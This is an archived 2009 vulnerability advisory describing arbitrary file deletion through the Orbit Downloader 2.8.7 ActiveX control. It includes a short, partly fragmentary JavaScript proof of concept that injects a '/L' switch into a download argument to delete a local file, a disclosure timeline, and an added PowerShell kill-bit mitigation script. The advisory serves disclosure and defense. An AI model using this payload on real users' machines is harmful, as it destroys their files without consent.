Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability

ID SSV:10862
Type seebug
Reporter Root
Modified 2009-03-24T00:00:00


No description provided by source.

[waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7

Author: Janek Vind "waraxe"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html

Description of vulnerable software:

Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.


List of found vulnerabilities

1. Arbitrary File Deletion

CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version:

Tested on following platforms:

1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7

In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.

Proof Of Concept:

<title>Orbit Downloader <= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
function test()
	waraxe.download('','','" /Lc:\\test.txt "','',1);
id="waraxe" name="waraxe"
width="50" height="50">
<button onclick="javascript:test();">  Test  </button>

For testing, first create a "test.txt" file in the C: root dir, then
open the page in IE and hit the Test button. "test.txt" should now be deleted :)

Disclosure Timeline:

03/04/09 Developer contacted
03/04/09 Developer's initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure
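
Mitigation sketch (added example, not part of the original advisory or the vendor's code): since 2.8.7 shipped without a fix, Internet Explorer can be told not to instantiate the control by setting the ActiveX kill bit (Compatibility Flags 0x400) for the CLSID listed above. The script assumes an elevated PowerShell prompt and covers both the native and the 32-bit (Wow6432Node) registry views.

```powershell
# Added example: set the IE kill bit for the Orbit Downloader ActiveX control.
# CLSID is taken from the advisory; everything else is standard IE behaviour.
$Clsid   = '{3F1D494B-0CEF-4468-96C9-386E2E4DEC90}'
$KillBit = 0x400                       # kill-bit value in "Compatibility Flags"
$Name    = 'Compatibility Flags'

# Native view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($root in $roots) {
    # Skip a view that does not exist (e.g. Wow6432Node on a 32-bit OS).
    if (-not (Test-Path -Path $root)) { continue }

    $key = Join-Path $root $Clsid
    if (-not (Test-Path -Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Read any existing flags so other compatibility bits are preserved.
    $prop    = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
    $current = if ($prop) { [int]$prop.$Name } else { 0 }

    if (($current -band $KillBit) -eq $KillBit) {
        Write-Output "Kill bit already set: $key"
        continue
    }

    $new = $current -bor $KillBit
    New-ItemProperty -Path $key -Name $Name -PropertyType DWord `
                     -Value $new -Force | Out-Null
    Write-Output ("Kill bit set: {0} (flags 0x{1:X} -> 0x{2:X})" -f $key, $current, $new)
}
```

The kill bit only stops Internet Explorer from loading the control; orbitmxt.dll stays on disk and the download manager itself keeps working.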


Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who knows me!


Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------